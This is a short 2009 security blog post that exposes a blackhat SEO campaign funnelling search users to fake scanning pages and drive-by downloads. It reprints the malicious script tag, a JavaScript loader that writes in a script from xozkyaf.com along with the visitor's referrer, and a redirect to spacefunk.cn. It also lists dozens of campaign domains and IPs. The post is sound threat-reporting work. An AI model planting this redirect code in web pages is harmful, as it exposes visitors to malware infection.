05
Jul
09

Blackhat SEO campaign with domains flooding search results-UPDATED

There is a blackhat seo campaign that is redirecting users to fake scanning websites to infect users. Each of these domains has many pages filled with keywords to get high rankings on search pages. Once clicked, the user is redirected to the drive-by download site of the day. You can click on each domain name to view the whois information. Here is a list of some of the domains as well as how it works.

<script type=”text/javascript” src=”/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoV
Cp_qCODoee2QvAwsxetjrz1uKFNY2brg”></script>

The following javascript is then loaded…

var t3dbj5es5;if (typeof(encodeURIComponent) == ‘function’) t3dbj5es5 = encodeURIComponent;else if (typeof(escape) == ‘function’) t3dbj5es5 = escape;else t3dbj5es5 = function (text) { return text; };document.write(‘<script src=”http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=’ + (document.referrer ? t3dbj5es5(document.referrer) : ”) + ‘” type=”text/javascript”></script>’);

The contents of the new page is below.

document.location.href=’http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1′;

Redirects to
hxxp://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1
Redirects to
Fake scanning page of the day as selected by malware distributers.

ufumtrwz.com 208.73.210.26
rmeged.com 208.87.149.250
stqbcfkjp.com 69.64.147.209
vhwdhjfig.com 69.64.147.210
pazjbw.com 69.64.147.210
rklktu.com 69.64.147.211
nbzqkp.com 69.64.147.212
wqtlto.com 69.64.147.212
klqltr.com 69.64.147.212
obirrd.com 69.64.147.212
qylzioqty.com 69.64.147.213
brohpql.com 69.64.147.214
atoonoyxm.com 69.64.147.215
ilmtvne.com 69.64.147.215
udtlgrzm.com 69.64.147.216
tnkpghmt.com 69.64.147.217
lpstjr.com 69.64.147.217
auvwbkdbe.com 69.64.147.217
colixfpf.com 69.64.155.120
qtltmzq.com 69.64.155.120
tgshpj.com 69.64.155.121
mkutvrah.com 69.64.155.121
nzadvyul.com 69.64.155.121
dvgbuqyg.com 69.64.155.121
nsqaidn.com 69.64.155.122
sambmq.com 69.64.155.122
sgkoqblfp.com 69.64.155.122
gxprzo.com 69.64.155.123
ujqqccmvd.com 69.64.155.124
dhmhcze.com 69.64.155.124
xarhwsvf.com 69.64.155.125
fitvahmz.com 69.64.155.126
vqtxnqmre.com 69.64.155.127
buzstyltd.com 69.64.155.127

UPDATED: 7/5/09

tvciucde.com 174.129.244.106 174.129.241.185
jmguhkxaj.com 194.110.162.82
nhroiv.com 194.110.162.83
gyadqcuoc.com 194.110.162.85
igvutelu.com 194.110.162.86
nqcngszq.com 194.110.162.86
birkkane.com 194.110.162.86
ouvthweg.com 194.110.162.89
vwsevihm.com 194.110.162.94
gakvgp.com 194.110.162.95
onnrdm.com 194.110.162.227


0 Responses to “Blackhat SEO campaign with domains flooding search results-UPDATED”


  1. No Comments

Leave a Reply

You must login to post a comment.




SANDBOX

SANDBOX ANALYSIS PAGE




 

July 2009
M T W T F S S
« Jun   Mar »
 12345
6789101112
13141516171819
20212223242526
2728293031